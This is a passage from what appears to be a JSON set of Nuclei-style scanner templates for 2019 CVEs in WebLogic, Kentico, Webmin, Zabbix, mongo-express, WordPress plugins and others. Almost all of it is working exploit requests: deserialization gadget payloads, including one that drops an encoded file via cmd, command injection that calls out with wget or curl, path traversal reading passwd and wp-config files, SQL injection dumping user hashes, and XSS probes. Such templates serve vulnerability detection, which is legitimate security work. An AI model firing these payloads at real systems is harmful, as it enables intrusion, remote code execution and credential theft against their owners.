index=\"3420\"><byte>53</byte></void><void index=\"3421\"><byte>97</byte></void><void index=\"3422\"><byte>54</byte></void><void index=\"3423\"><byte>48</byte></void><void index=\"3424\"><byte>56</byte></void><void index=\"3425\"><byte>113</byte></void><void index=\"3426\"><byte>0</byte></void><void index=\"3427\"><byte>126</byte></void><void index=\"3428\"><byte>0</byte></void><void index=\"3429\"><byte>8</byte></void><void index=\"3430\"><byte>120</byte></void><void index=\"3431\"><byte>118</byte></void><void index=\"3432\"><byte>114</byte></void><void index=\"3433\"><byte>0</byte></void><void index=\"3434\"><byte>29</byte></void><void index=\"3435\"><byte>106</byte></void><void index=\"3436\"><byte>97</byte></void><void index=\"3437\"><byte>118</byte></void><void index=\"3438\"><byte>97</byte></void><void index=\"3439\"><byte>120</byte></void><void index=\"3440\"><byte>46</byte></void><void index=\"3441\"><byte>120</byte></void><void index=\"3442\"><byte>109</byte></void><void index=\"3443\"><byte>108</byte></void><void index=\"3444\"><byte>46</byte></void><void index=\"3445\"><byte>116</byte></void><void index=\"3446\"><byte>114</byte></void><void index=\"3447\"><byte>97</byte></void><void index=\"3448\"><byte>110</byte></void><void index=\"3449\"><byte>115</byte></void><void index=\"3450\"><byte>102</byte></void><void index=\"3451\"><byte>111</byte></void><void index=\"3452\"><byte>114</byte></void><void index=\"3453\"><byte>109</byte></void><void index=\"3454\"><byte>46</byte></void><void index=\"3455\"><byte>84</byte></void><void index=\"3456\"><byte>101</byte></void><void index=\"3457\"><byte>109</byte></void><void index=\"3458\"><byte>112</byte></void><void index=\"3459\"><byte>108</byte></void><void index=\"3460\"><byte>97</byte></void><void index=\"3461\"><byte>116</byte></void><void index=\"3462\"><byte>101</byte></void><void index=\"3463\"><byte>115</byte></void><void index=\"3464\"><byte>0</byte></void><void index=\"3465\"><byte>0</byte></void><void index=\"3466\"><byte>0</byte></void><void index=\"3467\"><byte>0</byte></void><void index=\"3468\"><byte>0</byte></void><void index=\"3469\"><byte>0</byte></void><void index=\"3470\"><byte>0</byte></void><void index=\"3471\"><byte>0</byte></void><void index=\"3472\"><byte>0</byte></void><void index=\"3473\"><byte>0</byte></void><void index=\"3474\"><byte>0</byte></void><void index=\"3475\"><byte>120</byte></void><void index=\"3476\"><byte>112</byte></void><void index=\"3477\"><byte>120</byte></void></array></void></array></java></work:WorkContext></soapenv:Header><soapenv:Body><asy:onAsyncDelivery/></soapenv:Body></soapenv:Envelope>\n","GET /_async/favicon.ico HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"req-condition":true,"matchers-condition":"or","matchers":[{"type":"dsl","dsl":["status_code_1 == 200","contains(body_1, \"CVE-2019-2729-POC\")"],"condition":"and"},{"type":"dsl","dsl":["status_code_2 == 202","contains(body_3, \"Vulnerable\")"],"condition":"and"}]}]},{"id":"CVE-2019-15889","info":{"name":"WordPress Download Manager <2.9.94 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-17382","info":{"name":"Zabbix <=4.4 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /zabbix.php?action=dashboard.view&dashboardid={{ids}} HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"ids":"helpers/wordlists/numbers.txt"},"stop-at-first-match":true,"threads":50,"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9915","info":{"name":"GetSimple CMS 3.3.13 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /admin/index.php?redirect=https://interact.sh/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuserid={{username}}&pwd={{password}}&submitted=Login\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/"]}]}]},{"id":"CVE-2019-14205","info":{"name":"WordPress Nevma Adaptive Images <0.6.67 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12725","info":{"name":"Zeroshell 3.9.0 - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12583","info":{"name":"Zyxel ZyWall UAG/USG - Account Creation Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time.cgi"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["free_time_redirect.cgi?u=","&smsOnly=0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6112","info":{"name":"WordPress Sell Media 2.4.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["id=\"sell-media-search-text\" class=\"sell-media-search-text\"","alert(1337)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-2588","info":{"name":"Oracle Business Intelligence  - Path Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xmlpserver/servlet/adfresource?format=aaaaaaaaaaaaaaa&documentId=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini"],"matchers-condition":"and","matchers":[{"type":"word","words":["for 16-bit app support"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-9618","info":{"name":"WordPress GraceMedia Media Player 1.0 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200,500]}]}]},{"id":"CVE-2019-9922","info":{"name":"Joomla! Harmis Messenger 1.2.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/jemessenger/box_details?task=download&dw_file=../../.././../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-8086","info":{"name":"Adobe Experience Manager - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /content/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nsling:resourceType=fd/af/components/guideContainer\n","POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nAuthorization: Basic YWRtaW46YWRtaW4=\nReferer: {{BaseURL}}\n\nguideState={\"guideState\"%3a{\"guideDom\"%3a{},\"guideContext\"%3a{\"xsdRef\"%3a\"\",\"guidePrefillXml\"%3a\"<afData>\\u0041\\u0042\\u0043</afData>\"}}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<afData>ABC<afBoundData/>"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-3911","info":{"name":"LabKey Server Community Edition <18.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12581","info":{"name":"Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/free_time_failed.cgi?err_msg=<script>alert(document.domain);</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain);</script>","Please contact with administrator."],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-15107","info":{"name":"Webmin <= 1.920 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /password_change.cgi HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nReferer: {{BaseURL}}\nContent-Type: application/x-www-form-urlencoded\n\nuser=rootxx&pam=&old=test|cat /etc/passwd&new1=test2&new2=test2&expired=2\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2019-18394","info":{"name":"Ignite Realtime Openfire <=4.4.2 - Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/getFavicon?host=http://oast.fun/"],"matchers":[{"type":"dsl","dsl":["contains(body, 'Interactsh Server')","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-16931","info":{"name":"WordPress Visualizer <3.3.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-json/visualizer/v1/update-chart HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"id\": 7, \"visualizer-chart-type\": \"<script>alert(document.domain)</script>\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"success\":\"Chart updated\"}"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19134","info":{"name":"WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["foo\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10758","info":{"name":"mongo-express Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /checkValid HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzcw==\nContent-Type: application/x-www-form-urlencoded\n\ndocument=this.constructor.constructor(\"return process\")().mainModule.require(\"child_process\").execSync(\"curl {{interactsh-url}}\")\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-16332","info":{"name":"WordPress API Bearer Auth <20190907 - Cross-Site 